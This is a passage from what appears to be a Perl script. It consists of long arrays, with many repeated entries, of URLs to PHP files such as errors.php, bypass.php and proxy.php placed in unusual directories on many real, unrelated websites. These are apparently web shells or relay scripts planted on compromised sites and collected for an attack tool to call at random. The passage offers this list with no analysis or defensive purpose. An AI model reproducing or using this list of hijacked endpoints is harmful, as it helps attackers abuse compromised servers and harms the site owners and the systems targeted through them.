"http://www.ursaminorvehicles.com/errors/default/css/error.php", "http://patachou.com/js/lib/search.php", "http://www.energeticevolution.net/js/lib/search.php", "https://www.clematixdigital.com/errors/default/css/error.php", "http://www.mypgmee.com/media/catalog/product/2/error.php", "http://sales.luxxeen.com/errors/default/css/error.php", "http://www.exhibcouples.fr/errors.php", "http://www.tileandbathco.com/errors/default/css/error.php", "http://isnoffices.com/wp-content/themes/kim-remi/fonts/error.php", "http://chapmancycles.com/wp-admin/edit-link.php", "http://iweb365.co/errors/default/css/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://pngk.kz//logs/errors.php", "http://adoma.sk/errors.php", "http://www.veterinaigle.ch//media/errors.php", "http://dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.techlane.com.sg/errors.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://godreamsleepingbag.com/errors.php", "http://www.thaihospitalbed.com/var/locks/error.php", "http://www.eyeforce.com.tr/var/pass/search.php", "http://valentealexvalente.com/alex/wp-includes/error.php", "http://www.elado.ro//xmlrpc/error.php", "http://blog.eurostargym.com/wp-includes/js/thickbox/class-mail.php", "http://www.windfellows.org//plugins/editors/rokpad/error.php", "http://milesnation.com/whitney/css/error.php", "http://www.gardenmachinery.ie/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://www.telsonet.pl/errors.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://www.alexgretter.com/google.php", "http://www.pastorbonus.sk/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://circuitec.com.br/errors.php", "http://www.theatresprives.com/errors.php", "http://sufbellman.dk/media/error.php", "http://www.mariobabiera.com/google.php", "http://dailyfresh.nu/errors.php", "http://virtual-aerospace.co.jp/errors.php", "http://deangelisviaggi.it/errors.php", "http://pastorbonus.sk/errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://www.psdf.org.pk/errors.php", "http://iheld.com/errors.php", "http://bohealth.eu/media/com_jantivirus/css/index.php", "http://printfastt.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.kawaiishop.fr/var/pass/search.php", "http://lisarkent.com/errors.php", "http://savvyschools.ie/wp-includes/images/pass/script-loader.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://blizzsozz.com/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.mirabalcenter.org//errors.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://www.immobilienparaguay.com.py//templates/error.php", "http://muckrossparkcollege.com//plugins/editors/tinymce/error.php", "http://belarus-theatre.net/error.php", "http://www.decret-pinel.fr/wp-includes/error.php", "http://howfarbooks.com//images/stories/errors.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://interminas.ddns.net/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://www.kathleenferrari.com/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://australiansuperaudit.com.au/errors.php", "http://komunikacyjni.pl/wp-content/calander-date.php", "http://austriasport.nl/wp-includes/errors.php", "http://www.conac.cl/errors.php", "http://www.sci.kmutnb.ac.th/web/components/com_mailto/error.php", "http://beghellichina.com//media/system/js/error.php", "http://www.iek.kol.pl//media/system/css/error.php", "http://www.esteticaraffinata.com.br/errors.php", "http://www.studiofifteen.in/errors.php", "http://www.ibi.edu.au/includes/error.php", "http://www.omacmortgages.ie/error.php", "http://www.h-herms.es/wp-includes/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://madmanslay.free.fr/administrator/components/com_content/views/element/errors.php", "http://www.jourdets.com/piwik/libs/open-flash-chart/tmp-upload-images/error.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.bigswedestudios.com/errors.php", "http://www.isidarbink.lt/errors.php", "http://akcnibazar.cz/errors.php", "https://www.mypgmee.com/media/catalog/product/2/error.php", "http://www.mypgmee.com/media/catalog/product/2/search.php", "http://www.pastryideas.gr/skin/frontend/search.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://www.lafutbolera.net/images/error.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://member.marketingbodz.com/error.php", "http://kontento.eu/wp-content/themes/smartbox-theme/error.php", "http://www.oldfashionedman.com/errors.php", "citizenofburma.org//plugins/content/errors.php", "http://choir.louwanjpoujezi.org//plugins/content/errors.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://cnsave.koray.cn/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://centralcaixas.com/mdf/errors.php", "http://shardha.in/errors.php", "http://automarket-fortuna.ru/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://zend.secl.com.ua/media/bypass.php", "https://gpscsomagok.hu/skin/bypass.php", "http://hoponhopoff.ge//errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.rotarymowers.com.au/skin/errors.php", "http://www.travelpointer.ro//wp-includes/js/plupload/index.php", "http://www.atopsuccess.com//plugins/editors/error.php", "http://www.pkstorages.com//plugins/content/seka.php", "http://www.rateavon.je/error.php", "http://dateakademie.de/wp-includes/error.php", "http://themansphere.com/wp-includes/error.php", "http://hoponhopoff.ge/errors.php", "http://directproducts.co.zw/errors.php", "http://www.acdt-manutention.fr/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://secureindia.us/wp-admin/errors.php", "http://www.guliziagraphics.com/includes/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.alexgretter.com/google.php", "http://www.schilddruesenzentrum-wuerzburg.de/google.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://belarus-theatre.net/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://www.servercms.com/baldassarretipografi/wp-content/themes/error.php", "http://www.omacmortgages.ie/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://waiwaiopticfiber.com.br/plugins/editors/errors.php", "http://moveisperetti.com.br/plugins/editors/errors.php", "http://www.rudlucchbe.com/errors.php", "http://www.dp-cons.ro//wp-includes/error.php", "http://shop.progress-studio.com.ua/error.php", "http://mnstyle.eu/media/catalog/product/errors.php", "http://www.cossconsulting.com/errors.php", "http://trakimtuong.vn/admin/webroot/cache/Shel/errors.php", "https://www.ach.cl/wp-admin/includes/errors.php", "https://choptop.stage.city/picasa.net/errors.php", "https://www.debbiedawtrey.co.uk/wp-admin/includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.promidea.it//errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://sellallmyideas.com/errors.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://exhibcouples.fr/errors.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://citizenofburma.org//plugins/content/errors.php", "http://treboliberica.com/includes/errors.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://centralcaixas.com/mdf/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://interminas.ddns.net/errors.php", "http://cnsave.koray.cn/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://shardha.in/errors.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://politics.cnm.com.pt/errors.php", "http://imotionasia.com.vn/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://www.mirabalcenter.org//errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://automarket-fortuna.ru/errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "https://gpscsomagok.hu/skin/bypass.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://hoponhopoff.ge//errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.alexgretter.com/google.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://sufbellman.dk/media/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://virtual-aerospace.co.jp/errors.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.rateavon.je/error.php", "http://circuitec.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.mariobabiera.com/google.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.psdf.org.pk/errors.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.acdt-manutention.fr/errors.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://www.baliste-club.org//media/errors.php", "http://gaysm.pl/media/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://www.baskingshark.ie//media/errors.php", "http://representacoesdasa.com.br/wp-admin/errors.php", "http://ajansfestival.com/wp-admin/user/error.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://gaysm.pl/flash/modules/global/js/errors.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://oldfashionedman.com//errors.php", "http://www.shg-vaskulitis-eifel-mosel.de//forum/style/portal/error.php", "http://www.addisyouth.org.et/components/com_mailto/error.php", "http://tricotrico.com/wp-includes/error.php", "http://printfastt.com.br/errors.php", "http://www.gramophoneshop.nl/webshop//skin/frontend/default/errors.php", "http://www.skipperdean.com//media/errors.php", "http://prweb.com.sg/maimee/errors.php", "http://cmtactical.com//skin/install/default/default/errors.php", "http://www.lmcreativedesign.com.br/wp-content/plugins/errors.php", "https://www.aavamobile.com/modules/mod_search/index.php", "http://donghohanghieu.diemnhan.net//errors.php", "http://www.internetrights.in/wp-content/plugins/contact-form-7/images/service-icons/errors.php", "http://www.copati.org.br//images/jdownloads/screenshots/thumbnails/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://pastorbonus.sk/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://younik.co/error.php", "http://candidfeet.org/clip//admin_area/charts/tmp-upload-images/error.php", "http://cichlid77.free.fr/errors.php", "http://www.liftmaxthailand.com/downloader/template/errors.php", "http://www.petcubes.com.sg/downloader/Maged/Connect/options-header.php", "http://www.liftmaxthailand.com/js/options-header.php", "http://fifacompet.free.fr/components/com_joomleague/assets/errors.php", "http://www.avzootice.cz/includes/js/index2.php", "http://gentleheart.cz/includes/js/index2.php", "http://www.voyage-cambodge.org//images/banners/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://www.bam.co.th/bam/corporate/xmlrpc/index2.php", "http://imotionasia.com.vn/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://www.ursaminorvehicles.com/errors/default/css/error.php", "http://patachou.com/js/lib/search.php", "http://www.energeticevolution.net/js/lib/search.php", "https://www.clematixdigital.com/errors/default/css/error.php", "http://www.mypgmee.com/media/catalog/product/2/error.php", "http://sales.luxxeen.com/errors/default/css/error.php", "http://www.exhibcouples.fr/errors.php", "http://www.tileandbathco.com/errors/default/css/error.php", "http://isnoffices.com/wp-content/themes/kim-remi/fonts/error.php", "http://chapmancycles.com/wp-admin/edit-link.php", "http://iweb365.co/errors/default/css/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://pngk.kz//logs/errors.php", "http://adoma.sk/errors.php", "http://www.veterinaigle.ch//media/errors.php", "http://dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.techlane.com.sg/errors.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://godreamsleepingbag.com/errors.php", "http://www.thaihospitalbed.com/var/locks/error.php", "http://www.eyeforce.com.tr/var/pass/search.php", "http://valentealexvalente.com/alex/wp-includes/error.php", "http://www.elado.ro//xmlrpc/error.php", "http://blog.eurostargym.com/wp-includes/js/thickbox/class-mail.php", "http://www.windfellows.org//plugins/editors/rokpad/error.php", "http://milesnation.com/whitney/css/error.php", "http://www.gardenmachinery.ie/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://www.telsonet.pl/errors.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://www.alexgretter.com/google.php", "http://www.pastorbonus.sk/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://circuitec.com.br/errors.php", "http://www.theatresprives.com/errors.php", "http://sufbellman.dk/media/error.php", "http://www.mariobabiera.com/google.php", "http://dailyfresh.nu/errors.php", "http://virtual-aerospace.co.jp/errors.php", "http://deangelisviaggi.it/errors.php", "http://pastorbonus.sk/errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://www.psdf.org.pk/errors.php", "http://iheld.com/errors.php", "http://bohealth.eu/media/com_jantivirus/css/index.php", "http://printfastt.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.kawaiishop.fr/var/pass/search.php", "http://lisarkent.com/errors.php", "http://savvyschools.ie/wp-includes/images/pass/script-loader.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://blizzsozz.com/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.mirabalcenter.org//errors.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://www.immobilienparaguay.com.py//templates/error.php", "http://muckrossparkcollege.com//plugins/editors/tinymce/error.php", "http://belarus-theatre.net/error.php", "http://www.decret-pinel.fr/wp-includes/error.php", "http://howfarbooks.com//images/stories/errors.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://interminas.ddns.net/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://www.kathleenferrari.com/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://australiansuperaudit.com.au/errors.php", "http://komunikacyjni.pl/wp-content/calander-date.php", "http://austriasport.nl/wp-includes/errors.php", "http://www.conac.cl/errors.php", "http://www.sci.kmutnb.ac.th/web/components/com_mailto/error.php", "http://beghellichina.com//media/system/js/error.php", "http://www.iek.kol.pl//media/system/css/error.php", "http://www.esteticaraffinata.com.br/errors.php", "http://www.studiofifteen.in/errors.php", "http://www.ibi.edu.au/includes/error.php", "http://www.omacmortgages.ie/error.php", "http://www.h-herms.es/wp-includes/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://madmanslay.free.fr/administrator/components/com_content/views/element/errors.php", "http://www.jourdets.com/piwik/libs/open-flash-chart/tmp-upload-images/error.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.bigswedestudios.com/errors.php", "http://www.isidarbink.lt/errors.php", "http://akcnibazar.cz/errors.php", "https://www.mypgmee.com/media/catalog/product/2/error.php", "http://www.mypgmee.com/media/catalog/product/2/search.php", "http://www.pastryideas.gr/skin/frontend/search.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://www.lafutbolera.net/images/error.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://member.marketingbodz.com/error.php", "http://kontento.eu/wp-content/themes/smartbox-theme/error.php", "http://www.oldfashionedman.com/errors.php", "citizenofburma.org//plugins/content/errors.php", "http://choir.louwanjpoujezi.org//plugins/content/errors.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://cnsave.koray.cn/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://centralcaixas.com/mdf/errors.php", "http://shardha.in/errors.php", "http://automarket-fortuna.ru/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://zend.secl.com.ua/media/bypass.php", "https://gpscsomagok.hu/skin/bypass.php", "http://hoponhopoff.ge//errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.rotarymowers.com.au/skin/errors.php", "http://www.travelpointer.ro//wp-includes/js/plupload/index.php", "http://www.atopsuccess.com//plugins/editors/error.php", "http://www.pkstorages.com//plugins/content/seka.php", "http://www.rateavon.je/error.php", "http://dateakademie.de/wp-includes/error.php", "http://themansphere.com/wp-includes/error.php", "http://hoponhopoff.ge/errors.php", "http://directproducts.co.zw/errors.php", "http://www.acdt-manutention.fr/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php" ); my @random1 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", 